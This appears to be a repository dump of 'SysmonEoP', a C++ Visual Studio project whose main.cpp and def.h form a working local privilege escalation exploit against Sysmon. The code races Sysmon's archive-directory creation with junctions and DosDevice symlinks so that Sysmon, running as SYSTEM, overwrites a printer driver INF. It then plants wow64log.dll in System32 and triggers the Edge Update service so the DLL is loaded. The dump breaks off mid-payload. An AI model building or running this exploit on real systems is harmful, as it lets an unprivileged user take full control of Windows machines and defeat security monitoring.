<UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    
<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" 
Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      
<EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\r\n      <ProgramDataBaseFileName />\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n    <BuildLog>\r\n      <Path />\r\n    </BuildLog>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\" />\r\n    <ClCompile Include=\"sysmon_c.c\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Midl Include=\"sysmon.idl\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"def.h\" />\r\n    <ClInclude Include=\"resource.h\" />\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ResourceCompile 
Include=\"resource.rc\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "v2/SysmonEoP/SysmonEOP.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"main.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n    <ClCompile Include=\"sysmon_c.c\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <Midl Include=\"sysmon.idl\">\r\n      <Filter>Source Files</Filter>\r\n    </Midl>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"def.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"resource.h\">\r\n      <Filter>Header Files</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ResourceCompile Include=\"resource.rc\">\r\n      <Filter>Resource Files</Filter>\r\n    </ResourceCompile>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "v2/SysmonEoP/SysmonEOP.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "v2/SysmonEoP/def.h",
    "content": "#include <Windows.h>\r\n#include <winternl.h>\r\n#include <combaseapi.h>\r\n#include <comdef.h>\r\n#include <stdio.h>\r\n#include <Wbemidl.h>\r\n#include \"sysmon_h.h\"\r\n#include \"resource.h\"\r\n\r\n\r\n#pragma comment(lib, \"wbemuuid.lib\")\r\n#pragma comment(lib,\"RpcRT4.lib\")\r\n#pragma warning(disable:4996)\r\n\r\nstruct __declspec(uuid(\"A6B716CB-028B-404D-B72C-50E153DD68DA\")) CLSID_MSEdge_Object;\r\nclass __declspec(uuid(\"79e0c401-b7bc-4de5-8104-71350f3a9b67\")) IGoogleUpdate : IUnknown {\r\npublic:\r\n\r\n\r\n    HRESULT CheckForUpdate(const WCHAR* guid, VOID* observer);\r\n    HRESULT Update(const WCHAR* guid, VOID* observer);\r\n\r\n};\r\n\r\n//Variables\r\nwchar_t object[] = L\"Global\\\\GLOBALROOT\\\\RPC Control\\\\CLIP-876BEE15B64B610D2505A44596ED92FBA9624DB923F9D608698BD8C8E64E4F1A\";\r\nwchar_t sysmon[] = L\"C:\\\\SYSMON\";\r\nHANDLE hSysmon;\r\n//Functions*\r\nLPWSTR Find();\r\nvoid load();\r\nBOOL AddPrinterDriverWmi();\r\nvoid Trigger(LPWSTR alpc);\r\nLPWSTR  BuildPath(LPCWSTR path);\r\nBOOL CreateJunction(HANDLE dir, LPCWSTR target);\r\nBOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target);\r\nBOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target);\r\nBOOL DeleteJunction(HANDLE dir);\r\nVOID SetJunction();\r\ntypedef struct _REPARSE_DATA_BUFFER {\r\n    ULONG  ReparseTag;\r\n    USHORT ReparseDataLength;\r\n    USHORT Reserved;\r\n    union {\r\n        struct {\r\n            USHORT SubstituteNameOffset;\r\n            USHORT SubstituteNameLength;\r\n            USHORT PrintNameOffset;\r\n            USHORT PrintNameLength;\r\n            ULONG  Flags;\r\n            WCHAR  PathBuffer[1];\r\n        } SymbolicLinkReparseBuffer;\r\n        struct {\r\n            USHORT SubstituteNameOffset;\r\n            USHORT SubstituteNameLength;\r\n            USHORT PrintNameOffset;\r\n            USHORT PrintNameLength;\r\n            WCHAR  PathBuffer[1];\r\n        } MountPointReparseBuffer;\r\n        struct {\r\n            
UCHAR DataBuffer[1];\r\n        } GenericReparseBuffer;\r\n    } DUMMYUNIONNAME;\r\n} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;\r\ntypedef struct _OBJECT_DIRECTORY_INFORMATION {\r\n    UNICODE_STRING Name;\r\n    UNICODE_STRING TypeName;\r\n} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;\r\n#define STATUS_MORE_ENTRIES 0x00000105\r\n#define STATUS_NO_MORE_ENTRIES 0x8000001A\r\n#define IO_REPARSE_TAG_MOUNT_POINT              (0xA0000003L)\r\n\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK   IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);\r\ntypedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE DirectoryHandle, IN ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);\r\ntypedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_      HANDLE  DirectoryHandle, _Out_opt_ PVOID   Buffer, _In_ ULONG Length, _In_ BOOLEAN ReturnSingleEntry, _In_  BOOLEAN RestartScan, _Inout_   PULONG  Context, _Out_opt_ PULONG  ReturnLength);\r\ntypedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE  FileHandle,PIO_STATUS_BLOCK  IoStatusBlock,PVOID  FileInformation,ULONG  Length,ULONG FileInformationClass);\r\n\r\n_RtlInitUnicodeString pRtlInitUnicodeString;\r\n_NtCreateFile pNtCreateFile;\r\n_NtSetInformationFile pNtSetInformationFile;\r\n_NtQueryDirectoryObject pNtQueryDirectoryObject;\r\n_NtOpenDirectoryObject pNtOpenDirectoryObect;"
  },
  {
    "path": "v2/SysmonEoP/main.cpp",
    "content": "#include \"def.h\"\r\n\r\n\r\nint wmain(int argc, wchar_t* argv[])\r\n{\r\n    load();\r\n    LPWSTR alpc = Find();\r\n    HANDLE h1;\r\n    if (alpc == NULL) {\r\n        printf(\"[!] Failed to find ALPC port!\\n\");\r\n        return 1;\r\n    }\r\n    \r\n    // C:\\sysmon will become a junction to \\RPC Control (see SetJunction); this symlink makes the archive\r\n    // file name Sysmon writes there resolve to the printer driver INF, so Sysmon's SYSTEM-level delete and\r\n    // write land on that file.\r\n    DosDeviceSymLink(object, BuildPath(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\"));\r\n    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SetJunction, NULL, 0, NULL);\r\n   \r\n    Trigger(alpc);\r\n   \r\n    // Wait until the INF can no longer be opened, i.e. Sysmon has deleted it. Close every probe handle so\r\n    // we do not keep the file alive (delete-pending) ourselves.\r\n    do {\r\n        h1 = CreateFile(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\", GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n        if (h1 != INVALID_HANDLE_VALUE) CloseHandle(h1);\r\n    } while (h1 != INVALID_HANDLE_VALUE);\r\n    Sleep(500);\r\n    CloseHandle(hSysmon); // FILE_FLAG_DELETE_ON_CLOSE: removes the junction so Sysmon re-creates C:\\sysmon on the next trigger\r\n    printf(\"[+] Driver setup info file deleted!\\n\");\r\n    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SetJunction, NULL, 0, NULL);\r\n    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Trigger, alpc, 0, NULL);\r\n    // Wait until the INF exists again, i.e. Sysmon has written our modified INF in its place.\r\n    do {\r\n        h1 = CreateFile(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (h1 == INVALID_HANDLE_VALUE);\r\n    CloseHandle(h1);\r\n    HMODULE hm = GetModuleHandle(NULL);\r\n    HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L\"dll\");\r\n    DWORD DllSize = SizeofResource(hm, res);\r\n    void* DllBuff = LoadResource(hm, res);\r\n    printf(\"[+] Driver setup info file written.\\n\");\r\n    if (!AddPrinterDriverWmi()) {\r\n        printf(\"[!] Failed to add print driver!\\n\");\r\n        return 1;\r\n    }\r\n   \r\n    // The modified INF's CopyFiles section drops a copy of TTY.DLL as wow64log.dll in System32 with a DACL\r\n    // that lets authenticated users write it; wait for the spooler to create it, then overwrite it.\r\n    HANDLE dll;\r\n    do {\r\n        Sleep(1000);\r\n        dll = CreateFile(L\"C:\\\\windows\\\\system32\\\\wow64log.dll\", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\r\n    } while (dll == INVALID_HANDLE_VALUE);\r\n    printf(\"[+] DLL created!\\n\");\r\n    DWORD written = 0; // lpNumberOfBytesWritten must not be NULL for a synchronous WriteFile\r\n    WriteFile(dll, DllBuff, DllSize, &written, NULL);\r\n    CloseHandle(dll);\r\n    printf(\"[*] Triggering Edge Update service!\\n\");\r\n    HRESULT coini = CoInitialize(NULL);\r\n    IGoogleUpdate* updater = NULL;\r\n\r\n    HRESULT hr = CoCreateInstance(__uuidof(CLSID_MSEdge_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(updater), (PVOID*)&updater);\r\n    \r\n   \r\n    // Cleanup: drop the DosDevice symlink and the junction, then remove the planted DLL.\r\n    DelDosDeviceSymLink(object, BuildPath(L\"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\prnge001.inf_amd64_1daeee8f3aa30fcb\\\\prnge001.inf\"));\r\n    DeleteJunction(hSysmon);\r\n    while(!DeleteFile(L\"C:\\\\windows\\\\system32\\\\wow64log.dll\")){}\r\n    return 0;\r\n}\r\n\r\n// Race Sysmon: open C:\\sysmon as soon as Sysmon's CreateDirectory has created it (before SetFileSecurity\r\n// locks it down) and turn it into a junction to \\RPC Control, where our DosDevice symlink lives.\r\nVOID SetJunction() {\r\n    hSysmon = INVALID_HANDLE_VALUE;\r\n    SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);\r\n\r\n    do {\r\n        hSysmon = CreateFile(L\"C:\\\\sysmon\", FILE_WRITE_ATTRIBUTES | DELETE, FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_DELETE_ON_CLOSE, NULL);\r\n    } while (hSysmon == INVALID_HANDLE_VALUE);\r\n\r\n    CreateJunction(hSysmon, L\"\\\\RPC Control\");\r\n}\r\n\r\nvoid load() {\r\n    HMODULE ntdll = LoadLibraryW(L\"ntdll.dll\");\r\n    if (ntdll != NULL) {\r\n        pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, \"RtlInitUnicodeString\");\r\n        pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, \"NtCreateFile\");\r\n        pNtQueryDirectoryObject = (_NtQueryDirectoryObject)GetProcAddress(ntdll, 
\"NtQueryDirectoryObject\");\r\n        pNtOpenDirectoryObect = (_NtOpenDirectoryObject)GetProcAddress(ntdll, \"NtOpenDirectoryObject\");\r\n        pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll, \"NtSetInformationFile\");\r\n    }\r\n    if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL || pNtQueryDirectoryObject == NULL || pNtOpenDirectoryObect == NULL|| pNtSetInformationFile == NULL) {\r\n        printf(\"Cannot load api's %d\\n\", GetLastError());\r\n        exit(0);\r\n    }\r\n\r\n}\r\n\r\n\r\n\r\nBOOL CreateJunction(HANDLE hDir, LPCWSTR target) {\r\n    HANDLE hJunction;\r\n    DWORD cb;\r\n    wchar_t printname[] = L\"\";\r\n    if (hDir == INVALID_HANDLE_VALUE) {\r\n        printf(\"[!] HANDLE invalid!\\n\");\r\n        return FALSE;\r\n    }\r\n    SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);\r\n    SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);\r\n    SIZE_T PathLen = TargetLen + PrintnameLen + 12;\r\n    SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer));\r\n    PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);\r\n    Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\r\n    Data->ReparseDataLength = PathLen;\r\n    Data->Reserved = 0;\r\n    Data->MountPointReparseBuffer.SubstituteNameOffset = 0;\r\n    Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;\r\n    memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);\r\n    Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);\r\n    Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;\r\n    memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1, printname, PrintnameLen + 2);\r\n    WCHAR dir[MAX_PATH] = { 0x0 };\r\n    if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL, 0, &cb, NULL) != 0)\r\n    {\r\n\r\n        GetFinalPathNameByHandle(hDir, dir, MAX_PATH, 0);\r\n        printf(\"[+] 
Junction %ls -> %ls created!\\n\", dir, target);\r\n        free(Data);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n\r\n        printf(\"[!] Error: %d. Exiting\\n\", GetLastError());\r\n        free(Data);\r\n        return FALSE;\r\n    }\r\n}\r\nBOOL DeleteJunction(HANDLE handle) {\r\n    REPARSE_GUID_DATA_BUFFER buffer = { 0 };\r\n    BOOL ret;\r\n    buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;\r\n    DWORD cb = 0;\r\n    IO_STATUS_BLOCK io;\r\n    if (handle == INVALID_HANDLE_VALUE) {\r\n        printf(\"[!] HANDLE invalid!\\n\");\r\n        return FALSE;\r\n    }\r\n    WCHAR dir[MAX_PATH] = { 0x0 };\r\n    if (DeviceIoControl(handle, FSCTL_DELETE_REPARSE_POINT, &buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL)) {\r\n        GetFinalPathNameByHandle(handle, dir, MAX_PATH, 0);\r\n        printf(\"[+] Junction %ls deleted!\\n\", dir);\r\n        return TRUE;\r\n    }\r\n    else\r\n    {\r\n        printf(\"[!] Error: %d.\\n\", GetLastError());\r\n        return FALSE;\r\n    }\r\n}\r\n\r\nBOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {\r\n    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object, target)) {\r\n        printf(\"[+] Symlink %ls -> %ls created!\\n\", object, target);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n        printf(\"error :%d\\n\", GetLastError());\r\n        return FALSE;\r\n\r\n    }\r\n}\r\n\r\nBOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {\r\n    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {\r\n        printf(\"[+] Symlink %ls -> %ls deleted!\\n\", object, target);\r\n        return TRUE;\r\n\r\n    }\r\n    else\r\n    {\r\n        printf(\"error :%d\\n\", GetLastError());\r\n        return FALSE;\r\n\r\n\r\n    }\r\n}\r\n\r\nLPWSTR Find() {\r\n    HANDLE rpccontrolobj;\r\n    OBJECT_ATTRIBUTES obj;\r\n    const wchar_t rpccontrol[] = L\"\\\\RPC 
Control\";\r\n    UNICODE_STRING unicode_string = { 0 };\r\n    pRtlInitUnicodeString(&unicode_string, rpccontrol);\r\n    InitializeObjectAttributes(&obj, &unicode_string, 0, 0, 00);\r\n    // DIRECTORY_QUERY | DIRECTORY_TRAVERSE\r\n    NTSTATUS result = pNtOpenDirectoryObect(&rpccontrolobj, 0x0001 | 0x0002, &obj);\r\n    if (result == 0) {\r\n\r\n        BYTE* buffer = (BYTE*)malloc(100000);\r\n\r\n        ULONG start = 0, index = 0, bytes;\r\n        BOOLEAN restart = TRUE;\r\n        for (;;)\r\n        {\r\n            result = pNtQueryDirectoryObject(rpccontrolobj, (PBYTE)buffer, 100000, FALSE, restart, &index, &bytes);\r\n            // The buffer holds valid entries both on STATUS_SUCCESS and on STATUS_MORE_ENTRIES (partial listing).\r\n            if (result == 0 || result == STATUS_MORE_ENTRIES)\r\n            {\r\n                POBJECT_DIRECTORY_INFORMATION objectlist = (POBJECT_DIRECTORY_INFORMATION)buffer;\r\n                for (ULONG i = 0; i < index - start; i++)\r\n                {\r\n                    if (0 == wcsncmp(objectlist[i].TypeName.Buffer, L\"ALPC Port\", objectlist[i].TypeName.Length / sizeof(WCHAR)))\r\n                    {\r\n                        // Sysmon's clipboard RPC endpoint; the name points into the listing buffer, which is deliberately not freed.\r\n                        if (wcsstr(objectlist[i].Name.Buffer, L\"syscliprpc\")) {\r\n                            CloseHandle(rpccontrolobj);\r\n                            return objectlist[i].Name.Buffer;\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n            if (STATUS_MORE_ENTRIES == result)\r\n            {\r\n                start = index;\r\n                restart = FALSE;\r\n                continue;\r\n            }\r\n            // STATUS_SUCCESS (listing complete), STATUS_NO_MORE_ENTRIES or any other status: stop scanning.\r\n            CloseHandle(rpccontrolobj);\r\n            break;\r\n        }\r\n        free(buffer);\r\n        return NULL;\r\n    }\r\n    return NULL;\r\n}\r\n\r\n// Send a ClipboardChange event to Sysmon over ncalrpc; Sysmon archives the string in its ArchiveDirectory (C:\\Sysmon by default).\r\nvoid Trigger(LPWSTR alpc)\r\n{\r\n    RPC_STATUS status;\r\n    RPC_WSTR StringBinding;\r\n    RPC_BINDING_HANDLE Binding;\r\n    wchar_t data[] = L\"; Windows Inbox Printer Drivers\\n\\n[Version]\\nSignature=\\\"$Windows 
NT$\\\"\\nProvider=\\\"Microsoft\\\"\\nClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}\\nClass=Printer\\nCatalogFile=prnge001.cat\\nDriverVer = 06/21/2006,10.0.19041.1\\n\\n\\n[Manufacturer]\\n\\\"Generic\\\"=Generic,NTamd64\\n\\n[Test.CopyFiles]\\nwow64log.dll,TTY.DLL,,4\\n\\n[Test.CopyFiles.security]\\n\\\"D:AI(A;;GA;;;SY)(A;;GA;;;AU)(A;;GA;;;BA)\\\"\\n\\n\\n[Generic.NTamd64]\\n\\\"Generic / Text Only\\\"                                         = TTY.GPD,GenericGeneric_/_Tex8040,Generic_/_Text_Only\\n\\\"Generic IBM Graphics 9pin\\\"                                   = GENIBM9.GPD,GenericGeneric_IBM_GD35A,Generic_IBM_Graphics_9pin\\n\\\"Generic IBM Graphics 9pin wide\\\"                              = GENIBM9W.GPD,GenericGeneric_IBM_GC7D5,Generic_IBM_Graphics_9pin_wide\\n\\\"MS Publisher Color Printer\\\"                                  = MSGENCOL.PPD,GenericMS_Publisher_25C7,MS_Publisher_Color_Printer\\n\\\"MS Publisher Imagesetter\\\"                                    = MSGENBW.PPD,GenericMS_Publisher_B397,MS_Publisher_Imagesetter\\n\\n\\n[TTY.GPD]\\nCopyFiles=@TTYRES.DLL,@TTY.INI,@TTY.DLL,@TTYUI.DLL,@TTY.GPD,@TTYUI.HLP\\nCopyFiles=Test.CopyFiles\\nDataFile=TTY.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[GENIBM9.GPD]\\nCopyFiles=@OK9IBRES.DLL,@GENIBM9.GPD\\nDataFile=GENIBM9.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[GENIBM9W.GPD]\\nCopyFiles=@OK9IBRES.DLL,@GENIBM9W.GPD\\nDataFile=GENIBM9W.GPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\\\"\\n\\n[MSGENCOL.PPD]\\nCopyFiles=@MSGENCOL.PPD\\nDataFile=MSGENCOL.PPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\\\"\\n\\n[MSGENBW.PPD]\\nCopyFiles=@MSGENBW.PPD\\nDataFile=MSGENBW.PPD\\nCoreDriverSections=\\\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DA